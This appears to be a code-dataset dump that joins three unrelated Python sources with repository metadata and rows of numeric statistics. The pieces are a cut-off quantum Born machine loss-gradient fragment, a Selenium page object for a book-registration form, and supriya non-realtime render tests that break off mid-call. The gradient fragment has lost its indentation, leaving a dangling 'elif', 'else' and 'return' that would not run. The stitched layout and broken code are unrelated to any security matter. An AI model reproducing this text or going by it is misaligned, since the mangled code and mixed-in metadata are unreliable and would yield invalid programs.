# Compute the weighted kernel for each pair of samples required in the gradient of Stein Cost Function
kappa_q_born_bornplus = sf.WeightedKernel(qc, stein_kernel_choice, kernel_born_plus_emp, N_samples, data_samples, data_exact_dict,\
born_emp_samples, born_plus_emp_samples, stein_params, flag)
kappa_q_bornplus_born = sf.WeightedKernel(qc, stein_kernel_choice, kernel_plus_born_emp, N_samples, data_samples, \
data_exact_dict, born_plus_emp_samples, born_emp_samples, stein_params, flag)
kappa_q_born_bornminus = sf.WeightedKernel(qc, stein_kernel_choice, kernel_born_minus_emp, N_samples, data_samples,\
data_exact_dict, born_emp_samples, born_minus_emp_samples, stein_params, flag)
kappa_q_bornminus_born = sf.WeightedKernel(qc, stein_kernel_choice, kernel_minus_born_emp, N_samples, data_samples,\
data_exact_dict, born_minus_emp_samples, born_emp_samples, stein_params, flag)
loss_grad = np.dot(np.dot(born_emp_probs, kappa_q_born_bornminus), born_minus_emp_probs) \
+ np.dot(np.dot(born_minus_emp_probs, kappa_q_bornminus_born), born_emp_probs) \
- np.dot(np.dot(born_emp_probs, kappa_q_born_bornplus), born_plus_emp_probs) \
- np.dot(np.dot(born_plus_emp_probs, kappa_q_bornplus_born), born_emp_probs)
elif cost_func.lower() == 'sinkhorn':
        loss_grad = shornfun.SinkGrad(born_samples, born_samples_pm, data_samples, sinkhorn_eps)
else: raise ValueError('\'cost_func\' must be either \'MMD\', \'Stein\', or \'Sinkhorn\' ')
return loss_grad
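The 'approx' MMD gradient above reduces to four quadratic forms coupling the Born and data probabilities to the +/- shifted-circuit probabilities. A toy sketch of that structure (all matrices and probability vectors below are made-up placeholders, not real kernel evaluations):

```python
import numpy as np

rng = np.random.default_rng(0)

def toy_kernel_block(n, m):
    # Random stand-in for a kernel matrix block, for illustration only.
    return rng.random((n, m))

born_probs = np.array([0.6, 0.4])
data_probs = np.array([0.5, 0.5])
plus_probs = np.array([0.7, 0.3])    # empirical probs of the +shift circuit
minus_probs = np.array([0.2, 0.8])   # empirical probs of the -shift circuit

K_born_plus = toy_kernel_block(2, 2)
K_born_minus = toy_kernel_block(2, 2)
K_data_plus = toy_kernel_block(2, 2)
K_data_minus = toy_kernel_block(2, 2)

# Same quadratic-form structure as the 'approx' MMD gradient above.
loss_grad = 2 * (born_probs @ K_born_minus @ minus_probs
                 - born_probs @ K_born_plus @ plus_probs
                 - data_probs @ K_data_minus @ minus_probs
                 + data_probs @ K_data_plus @ plus_probs)
print(float(loss_grad))
```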
| 60.580328 | 139 | 0.661796 | 2,277 | 18,477 | 4.958718 | 0.075099 | 0.080595 | 0.059516 | 0.04942 | 0.840847 | 0.828093 | 0.802055 | 0.77823 | 0.728988 | 0.694004 | 0 | 0.007552 | 0.261839 | 18,477 | 304 | 140 | 60.779605 | 0.820295 | 0.120041 | 0 | 0.544041 | 0 | 0 | 0.031339 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015544 | false | 0 | 0.062176 | 0 | 0.093264 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
706d1d9850e37e657caa2704bd798d9015a6db7e | 2,065 | py | Python | script/pages/regist_page.py | ybkuroki/selenium-e2e-sample | 18a7e92d9b338104ac8b418a6987cadfd1c12d39 | [
"MIT"
] | 1 | 2021-09-08T20:05:40.000Z | 2021-09-08T20:05:40.000Z | script/pages/regist_page.py | ybkuroki/selenium-e2e-sample | 18a7e92d9b338104ac8b418a6987cadfd1c12d39 | [
"MIT"
] | null | null | null | script/pages/regist_page.py | ybkuroki/selenium-e2e-sample | 18a7e92d9b338104ac8b418a6987cadfd1c12d39 | [
"MIT"
] | null | null | null | #!/usr/local/bin/python3
from selenium.webdriver.common.keys import Keys
from pages import PageObject
from time import sleep
# Registration page
class RegistPage(PageObject):
    # Click the "New registration" menu.
def click_regist_menu(self):
self.find_element_by_xpath("//div[contains(@class, 'ui fixed top menu')]/a[contains(@class, 'item')][2]").click()
sleep(1)
    # Enter the book title.
def set_title(self, title):
self.find_element_by_xpath("//div[contains(@class, 'ui modal visible active')]/div[contains(@class, 'content')]/div[contains(@class, 'ui form')]/div[contains(@class, 'field')][1]/input").send_keys(title)
    # Enter the ISBN.
def set_isbn(self, isbn):
self.find_element_by_xpath("//div[contains(@class, 'ui modal visible active')]/div[contains(@class, 'content')]/div[contains(@class, 'ui form')]/div[contains(@class, 'field')][2]/input").send_keys(isbn)
    # Set the category.
def set_category(self, category):
self.find_element_by_xpath("//div[contains(@class, 'ui modal visible active')]/div[contains(@class, 'content')]/div[contains(@class, 'ui form')]/div[contains(@class, 'field')][3]/div[contains(@class, 'ui selection dropdown')]").click()
sleep(0.5)
self.find_element_by_xpath("//div[contains(@class, 'menu transition visible')]/div[contains(text(), '" + category + "')]").click()
sleep(0.5)
    # Set the format.
def set_format(self, format):
self.find_element_by_xpath("//div[contains(@class, 'ui modal visible active')]/div[contains(@class, 'content')]/div[contains(@class, 'ui form')]/div[contains(@class, 'field')][4]/div[contains(@class, 'ui selection dropdown')]").click()
sleep(0.5)
self.find_element_by_xpath("//div[contains(@class, 'menu transition visible')]/div[contains(text(), '" + format + "')]").click()
sleep(0.5)
    # Click the register button.
def click_regist_button(self):
self.find_element_by_xpath("//div[contains(@class, 'ui modal visible active')]/div[contains(@class, 'actions')]/div[contains(text(), '登録')]").click()
sleep(5)
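The class above is a standard page-object wrapper around XPath lookups. The pattern can be exercised without a browser by stubbing the driver; FakeDriver, FakeElement, and the XPath below are hypothetical stand-ins, not part of the real test suite.

```python
# Minimal page-object sketch with a stubbed driver (no real browser needed).
class FakeElement:
    def __init__(self, log, xpath):
        self.log, self.xpath = log, xpath

    def click(self):
        self.log.append(("click", self.xpath))

    def send_keys(self, text):
        self.log.append(("send_keys", self.xpath, text))

class FakeDriver:
    def __init__(self):
        self.log = []

    def find_element_by_xpath(self, xpath):
        # Record every lookup; return an element that logs its interactions.
        return FakeElement(self.log, xpath)

class RegistPageStub:
    def __init__(self, driver):
        self.driver = driver

    def set_title(self, title):
        self.driver.find_element_by_xpath("//input[@name='title']").send_keys(title)

driver = FakeDriver()
page = RegistPageStub(driver)
page.set_title("Python Primer")
print(driver.log)
```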
| 51.625 | 243 | 0.660048 | 272 | 2,065 | 4.886029 | 0.238971 | 0.215199 | 0.2769 | 0.162528 | 0.647103 | 0.647103 | 0.647103 | 0.647103 | 0.647103 | 0.647103 | 0 | 0.00907 | 0.145763 | 2,065 | 39 | 244 | 52.948718 | 0.744331 | 0.047942 | 0 | 0.166667 | 0 | 0.25 | 0.534219 | 0.384065 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.125 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
70a4dd3264345101446d0a6410a8c131eec1b019 | 41,573 | py | Python | tests/nonrealtime/test_nonrealtime_Session_render.py | deeuu/supriya | 14fcb5316eccb4dafbe498932ceff56e1abb9d27 | [
"MIT"
] | null | null | null | tests/nonrealtime/test_nonrealtime_Session_render.py | deeuu/supriya | 14fcb5316eccb4dafbe498932ceff56e1abb9d27 | [
"MIT"
] | null | null | null | tests/nonrealtime/test_nonrealtime_Session_render.py | deeuu/supriya | 14fcb5316eccb4dafbe498932ceff56e1abb9d27 | [
"MIT"
] | null | null | null | import os
import pathlib
import pprint
import pytest
import uqbar.strings
import supriya
import supriya.nonrealtime
import supriya.soundfiles
def test_00a(nonrealtime_paths):
"""
No input, no output file path specified, no render path specified.
"""
session = pytest.helpers.make_test_session()
exit_code, output_file_path = session.render()
pytest.helpers.assert_soundfile_ok(output_file_path, exit_code, 10.0, 44100, 8)
assert pathlib.Path(supriya.output_path) in output_file_path.parents
assert pytest.helpers.sample_soundfile(output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.41: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.61: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.81: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
0.99: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
}
def test_00b(nonrealtime_paths):
"""
No input, no output file path specified, render path specified.
"""
session = pytest.helpers.make_test_session()
exit_code, output_file_path = session.render(
render_directory_path=nonrealtime_paths.render_directory_path
)
pytest.helpers.assert_soundfile_ok(output_file_path, exit_code, 10.0, 44100, 8)
assert (
pathlib.Path(nonrealtime_paths.render_directory_path)
in output_file_path.parents
)
assert pytest.helpers.sample_soundfile(output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.41: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.61: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.81: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
0.99: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
}
def test_00c(nonrealtime_paths):
"""
No input, no output file path specified, no render path specified,
output already exists.
"""
session = pytest.helpers.make_test_session()
osc_path = pathlib.Path().joinpath(
supriya.output_path, "session-7b3f85710f19667f73f745b8ac8080a0.osc"
)
aiff_path = pathlib.Path().joinpath(
supriya.output_path, "session-7b3f85710f19667f73f745b8ac8080a0.aiff"
)
if osc_path.exists():
osc_path.unlink()
if aiff_path.exists():
aiff_path.unlink()
exit_code, output_file_path = session.render()
pytest.helpers.assert_soundfile_ok(output_file_path, exit_code, 10.0, 44100, 8)
assert pytest.helpers.sample_soundfile(output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.41: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.61: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.81: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
0.99: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
}
executable = os.environ.get("SCSYNTH_PATH", "scsynth")
assert session.transcript == [
"Writing session-7b3f85710f19667f73f745b8ac8080a0.osc.",
" Wrote session-7b3f85710f19667f73f745b8ac8080a0.osc.",
"Rendering session-7b3f85710f19667f73f745b8ac8080a0.osc.",
f" Command: {executable} -N session-7b3f85710f19667f73f745b8ac8080a0.osc _ session-7b3f85710f19667f73f745b8ac8080a0.aiff 44100 aiff int24",
" Rendered session-7b3f85710f19667f73f745b8ac8080a0.osc with exit code 0.",
]
assert output_file_path == aiff_path
assert osc_path.exists()
assert aiff_path.exists()
exit_code, output_file_path = session.render()
pytest.helpers.assert_soundfile_ok(output_file_path, exit_code, 10.0, 44100, 8)
assert pytest.helpers.sample_soundfile(output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.41: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.61: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.81: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
0.99: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
}
assert session.transcript == [
"Writing session-7b3f85710f19667f73f745b8ac8080a0.osc.",
" Skipped session-7b3f85710f19667f73f745b8ac8080a0.osc. File already exists.",
"Rendering session-7b3f85710f19667f73f745b8ac8080a0.osc.",
" Skipped session-7b3f85710f19667f73f745b8ac8080a0.osc. Output already exists.",
]
assert output_file_path == aiff_path
assert osc_path.exists()
assert aiff_path.exists()
osc_path.unlink()
exit_code, output_file_path = session.render()
pytest.helpers.assert_soundfile_ok(output_file_path, exit_code, 10.0, 44100, 8)
assert pytest.helpers.sample_soundfile(output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.41: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.61: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.81: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
0.99: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
}
assert session.transcript == [
"Writing session-7b3f85710f19667f73f745b8ac8080a0.osc.",
" Wrote session-7b3f85710f19667f73f745b8ac8080a0.osc.",
"Rendering session-7b3f85710f19667f73f745b8ac8080a0.osc.",
" Skipped session-7b3f85710f19667f73f745b8ac8080a0.osc. Output already exists.",
]
assert output_file_path == aiff_path
assert osc_path.exists()
assert aiff_path.exists()
aiff_path.unlink()
exit_code, output_file_path = session.render()
pytest.helpers.assert_soundfile_ok(output_file_path, exit_code, 10.0, 44100, 8)
assert pytest.helpers.sample_soundfile(output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.41: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.61: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.81: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
0.99: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
}
assert session.transcript == [
"Writing session-7b3f85710f19667f73f745b8ac8080a0.osc.",
" Skipped session-7b3f85710f19667f73f745b8ac8080a0.osc. File already exists.",
"Rendering session-7b3f85710f19667f73f745b8ac8080a0.osc.",
f" Command: {executable} -N session-7b3f85710f19667f73f745b8ac8080a0.osc _ session-7b3f85710f19667f73f745b8ac8080a0.aiff 44100 aiff int24",
" Rendered session-7b3f85710f19667f73f745b8ac8080a0.osc with exit code 0.",
]
assert output_file_path == aiff_path
assert osc_path.exists()
assert aiff_path.exists()
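The transcript assertions above exercise content-addressed render caching: the .osc and .aiff names are derived from a hash of the session, so an unchanged session skips both the write and the render step. A rough stand-in for that skip logic (file names and messages modeled on the transcript; the scsynth invocation is replaced by a placeholder write):

```python
import hashlib
import pathlib
import tempfile

def render(osc_bytes, directory):
    # The render name hashes the serialized OSC score, so identical
    # sessions always map to the same pair of files.
    digest = hashlib.md5(osc_bytes).hexdigest()
    osc_path = directory / f"session-{digest}.osc"
    aiff_path = directory / f"session-{digest}.aiff"
    transcript = []
    if osc_path.exists():
        transcript.append(f"Skipped {osc_path.name}. File already exists.")
    else:
        osc_path.write_bytes(osc_bytes)
        transcript.append(f"Wrote {osc_path.name}.")
    if aiff_path.exists():
        transcript.append(f"Skipped {osc_path.name}. Output already exists.")
    else:
        aiff_path.write_bytes(b"")  # placeholder for the scsynth -N invocation
        transcript.append(f"Rendered {osc_path.name} with exit code 0.")
    return transcript

with tempfile.TemporaryDirectory() as tmp:
    directory = pathlib.Path(tmp)
    first = render(b"/d_recv ...", directory)
    second = render(b"/d_recv ...", directory)
print(first)
print(second)
```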
def test_01(nonrealtime_paths):
"""
No input.
"""
session = pytest.helpers.make_test_session()
synthdef = pytest.helpers.build_dc_synthdef(8)
assert synthdef.anonymous_name == "b47278d408f17357f6b260ec30ea213d"
assert session.to_lists() == [
[
0.0,
[
["/d_recv", synthdef.compile()],
["/s_new", "b47278d408f17357f6b260ec30ea213d", 1000, 0, 0, "source", 0],
],
],
[2.0, [["/n_set", 1000, "source", 0.25]]],
[4.0, [["/n_set", 1000, "source", 0.5]]],
[6.0, [["/n_set", 1000, "source", 0.75]]],
[8.0, [["/n_set", 1000, "source", 1.0]]],
[10.0, [["/n_free", 1000], [0]]],
]
exit_code, _ = session.render(
nonrealtime_paths.output_file_path,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(
nonrealtime_paths.output_file_path, exit_code, 10.0, 44100, 8
)
assert pytest.helpers.sample_soundfile(nonrealtime_paths.output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.41: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.61: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.81: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
0.99: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
}
assert nonrealtime_paths.render_yml_file_path.exists()
with nonrealtime_paths.render_yml_file_path.open() as file_pointer:
file_contents = uqbar.strings.normalize(file_pointer.read())
assert file_contents == uqbar.strings.normalize(
"""
render: session-7b3f85710f19667f73f745b8ac8080a0
source: null
"""
)
def test_02(nonrealtime_paths):
"""
Soundfile NRT input, matched channels.
"""
path_one = nonrealtime_paths.output_directory_path / "output-one.aiff"
path_two = nonrealtime_paths.output_directory_path / "output-two.aiff"
session_one = pytest.helpers.make_test_session()
exit_code, _ = session_one.render(
path_one,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(path_one, exit_code, 10.0, 44100, 8)
session_two = supriya.nonrealtime.Session(input_=path_one)
synthdef = pytest.helpers.build_multiplier_synthdef(8)
with session_two.at(0):
session_two.add_synth(
synthdef=synthdef,
duration=10,
in_bus=session_two.audio_input_bus_group,
out_bus=session_two.audio_output_bus_group,
multiplier=-0.5,
)
exit_code, _ = session_two.render(
path_two,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(path_two, exit_code, 10.0, 44100, 8)
assert pytest.helpers.sample_soundfile(path_two) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [-0.125, -0.125, -0.125, -0.125, -0.125, -0.125, -0.125, -0.125],
0.41: [-0.25, -0.25, -0.25, -0.25, -0.25, -0.25, -0.25, -0.25],
0.61: [-0.375, -0.375, -0.375, -0.375, -0.375, -0.375, -0.375, -0.375],
0.81: [-0.5, -0.5, -0.5, -0.5, -0.5, -0.5, -0.5, -0.5],
0.99: [-0.5, -0.5, -0.5, -0.5, -0.5, -0.5, -0.5, -0.5],
}
assert nonrealtime_paths.render_yml_file_path.exists()
with nonrealtime_paths.render_yml_file_path.open() as file_pointer:
file_contents = uqbar.strings.normalize(file_pointer.read())
assert file_contents == uqbar.strings.normalize(
"""
render: session-34a8138953258b32d05ed6e09ebdf5b7
source: null
"""
)
def test_03(nonrealtime_paths):
"""
Soundfile NRT input, mismatched channels.
"""
path_one = nonrealtime_paths.output_directory_path / "output-one.aiff"
path_two = nonrealtime_paths.output_directory_path / "output-two.aiff"
session_one = pytest.helpers.make_test_session()
exit_code, _ = session_one.render(
path_one,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(path_one, exit_code, 10.0, 44100, 8)
session_two = supriya.nonrealtime.Session(
input_=path_one, input_bus_channel_count=2, output_bus_channel_count=4
)
synthdef = pytest.helpers.build_multiplier_synthdef(4)
with session_two.at(0):
session_two.add_synth(
synthdef=synthdef,
duration=10,
in_bus=session_two.audio_input_bus_group,
out_bus=session_two.audio_output_bus_group,
multiplier=-0.5,
)
assert session_two.to_lists() == [
[
0.0,
[
["/d_recv", bytearray(synthdef.compile())],
[
"/s_new",
"1d83a887914f0ac8ac3de461f4cc637c",
1000,
0,
0,
"in_bus",
4,
"multiplier",
-0.5,
"out_bus",
0,
],
],
],
[10.0, [["/n_free", 1000], [0]]],
]
exit_code, _ = session_two.render(
path_two,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(path_two, exit_code, 10.0, 44100, 4)
assert pytest.helpers.sample_soundfile(path_two) == {
0.0: [0.0, 0.0, 0.0, 0.0],
0.21: [-0.125, -0.125, -0.125, -0.125],
0.41: [-0.25, -0.25, -0.25, -0.25],
0.61: [-0.375, -0.375, -0.375, -0.375],
0.81: [-0.5, -0.5, -0.5, -0.5],
0.99: [-0.5, -0.5, -0.5, -0.5],
}
assert nonrealtime_paths.render_yml_file_path.exists()
with nonrealtime_paths.render_yml_file_path.open() as file_pointer:
file_contents = uqbar.strings.normalize(file_pointer.read())
assert file_contents == uqbar.strings.normalize(
"""
render: session-f90a25f63698e1c8c4f6fe63d7d87bc4
source: null
"""
)
def test_04(nonrealtime_paths):
"""
Session NRT input, matched channels.
"""
session_one = pytest.helpers.make_test_session()
session_two = supriya.nonrealtime.Session(input_=session_one, name="outer-session")
synthdef = pytest.helpers.build_multiplier_synthdef(8)
with session_two.at(0):
session_two.add_synth(
synthdef=synthdef,
duration=10,
in_bus=session_two.audio_input_bus_group,
out_bus=session_two.audio_output_bus_group,
multiplier=-0.5,
)
assert session_two.to_lists() == [
[
0.0,
[
["/d_recv", bytearray(synthdef.compile())],
[
"/s_new",
"76abe8508565e1ca3dd243fe960a6945",
1000,
0,
0,
"in_bus",
8,
"multiplier",
-0.5,
"out_bus",
0,
],
],
],
[10.0, [["/n_free", 1000], [0]]],
]
exit_code, _ = session_two.render(
nonrealtime_paths.output_file_path,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(
nonrealtime_paths.output_file_path, exit_code, 10.0, 44100, 8
)
assert pytest.helpers.sample_soundfile(nonrealtime_paths.output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [-0.125, -0.125, -0.125, -0.125, -0.125, -0.125, -0.125, -0.125],
0.41: [-0.25, -0.25, -0.25, -0.25, -0.25, -0.25, -0.25, -0.25],
0.61: [-0.375, -0.375, -0.375, -0.375, -0.375, -0.375, -0.375, -0.375],
0.81: [-0.5, -0.5, -0.5, -0.5, -0.5, -0.5, -0.5, -0.5],
0.99: [-0.5, -0.5, -0.5, -0.5, -0.5, -0.5, -0.5, -0.5],
}
assert nonrealtime_paths.render_yml_file_path.exists()
with nonrealtime_paths.render_yml_file_path.open() as file_pointer:
file_contents = uqbar.strings.normalize(file_pointer.read())
assert file_contents == uqbar.strings.normalize(
"""
render: session-0038ce94f2ab7825919c1b5e1d5f2e82
source:
- session-7b3f85710f19667f73f745b8ac8080a0
"""
)
def test_05(nonrealtime_paths):
"""
Soundfile DiskIn input.
"""
path_one = nonrealtime_paths.output_directory_path / "output-one.aiff"
path_two = nonrealtime_paths.output_directory_path / "output-two.aiff"
session_one = pytest.helpers.make_test_session()
exit_code, _ = session_one.render(
path_one,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(path_one, exit_code, 10.0, 44100, 8)
session_two = supriya.nonrealtime.Session()
synthdef = pytest.helpers.build_diskin_synthdef(channel_count=8)
with session_two.at(0):
buffer_ = session_two.cue_soundfile(path_one, duration=10)
session_two.add_synth(synthdef=synthdef, buffer_id=buffer_, duration=10)
assert session_two.to_lists() == [
[
0.0,
[
["/d_recv", bytearray(synthdef.compile())],
["/b_alloc", 0, 32768, 8],
["/b_read", 0, str(path_one), 0, -1, 0, 1],
[
"/s_new",
"42367b5102dfa250b301ec698b3bd6c4",
1000,
0,
0,
"buffer_id",
0,
],
],
],
[10.0, [["/n_free", 1000], ["/b_close", 0], ["/b_free", 0], [0]]],
]
exit_code, _ = session_two.render(
path_two,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(path_two, exit_code, 10.0, 44100, 8)
assert pytest.helpers.sample_soundfile(path_two) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.41: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.61: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.81: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
0.99: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
}
# NOTE: Render YML is not portable across systems.
# Do not verify its output.
assert nonrealtime_paths.render_yml_file_path.exists()
def test_06(nonrealtime_paths):
"""
Session DiskIn input.
"""
session_one = pytest.helpers.make_test_session()
session_two = supriya.nonrealtime.Session(name="outer-session")
synthdef = pytest.helpers.build_diskin_synthdef(channel_count=8)
with session_two.at(0):
buffer_ = session_two.cue_soundfile(session_one, duration=10)
session_two.add_synth(synthdef=synthdef, buffer_id=buffer_, duration=10)
assert session_two.to_lists() == [
[
0.0,
[
["/d_recv", bytearray(synthdef.compile())],
["/b_alloc", 0, 32768, 8],
[
"/b_read",
0,
"session-7b3f85710f19667f73f745b8ac8080a0.aiff",
0,
-1,
0,
1,
],
[
"/s_new",
"42367b5102dfa250b301ec698b3bd6c4",
1000,
0,
0,
"buffer_id",
0,
],
],
],
[10.0, [["/n_free", 1000], ["/b_close", 0], ["/b_free", 0], [0]]],
]
exit_code, _ = session_two.render(
nonrealtime_paths.output_file_path,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
pytest.helpers.assert_soundfile_ok(
nonrealtime_paths.output_file_path, exit_code, 10.0, 44100, 8
)
assert pytest.helpers.sample_soundfile(nonrealtime_paths.output_file_path) == {
0.0: [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
0.21: [0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
0.41: [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
0.61: [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75],
0.81: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
0.99: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
}
assert nonrealtime_paths.render_yml_file_path.exists()
with nonrealtime_paths.render_yml_file_path.open() as file_pointer:
file_contents = uqbar.strings.normalize(file_pointer.read())
assert file_contents == uqbar.strings.normalize(
"""
render: session-fbd50fbec743e7758481debe0450f38c
source:
- session-7b3f85710f19667f73f745b8ac8080a0
"""
)
def test_07(nonrealtime_paths):
"""
Chained Session DiskIn input.
"""
session_one = pytest.helpers.make_test_session()
session_two = supriya.nonrealtime.Session(name="middle-session")
session_three = supriya.nonrealtime.Session(name="outer-session")
diskin_synthdef = pytest.helpers.build_diskin_synthdef(channel_count=8)
multiplier_synthdef = pytest.helpers.build_multiplier_synthdef(channel_count=8)
with session_two.at(0):
buffer_ = session_two.cue_soundfile(session_one, duration=10)
synth = session_two.add_synth(
synthdef=diskin_synthdef, buffer_id=buffer_, duration=10
)
synth.add_synth(
add_action="ADD_AFTER",
duration=10,
synthdef=multiplier_synthdef,
multiplier=-1.0,
)
with session_three.at(0):
buffer_ = session_three.cue_soundfile(session_two, duration=10)
synth = session_three.add_synth(
synthdef=diskin_synthdef, buffer_id=buffer_, duration=10
)
synth.add_synth(
add_action="ADD_AFTER",
duration=10,
synthdef=multiplier_synthdef,
multiplier=-0.5,
)
d_recv_commands = pytest.helpers.build_d_recv_commands(
[diskin_synthdef, multiplier_synthdef]
)
buffer_one_name = "session-7b3f85710f19667f73f745b8ac8080a0.aiff"
assert session_two.to_lists() == [
[
0.0,
[
*d_recv_commands,
["/b_alloc", 0, 32768, 8],
["/b_read", 0, buffer_one_name, 0, -1, 0, 1],
[
"/s_new",
"42367b5102dfa250b301ec698b3bd6c4",
1000,
0,
0,
"buffer_id",
0,
],
[
"/s_new",
"76abe8508565e1ca3dd243fe960a6945",
1001,
3,
1000,
"multiplier",
-1.0,
],
],
],
[10.0, [["/n_free", 1000, 1001], ["/b_close", 0], ["/b_free", 0], [0]]],
]
buffer_two_name = "session-a9bccd241b0e5b56d123924992fbdc05.aiff"
assert session_three.to_lists() == [
[
0.0,
[
*d_recv_commands,
["/b_alloc", 0, 32768, 8],
["/b_read", 0, buffer_two_name, 0, -1, 0, 1],
[
"/s_new",
"42367b5102dfa250b301ec698b3bd6c4",
1000,
0,
0,
"buffer_id",
0,
],
[
"/s_new",
"76abe8508565e1ca3dd243fe960a6945",
1001,
3,
1000,
"multiplier",
-0.5,
],
],
],
[10.0, [["/n_free", 1000, 1001], ["/b_close", 0], ["/b_free", 0], [0]]],
]
buffer_one_path = nonrealtime_paths.render_directory_path / buffer_one_name
buffer_two_path = nonrealtime_paths.render_directory_path / buffer_two_name
assert not buffer_one_path.exists()
assert not buffer_two_path.exists()
exit_code, _ = session_three.render(
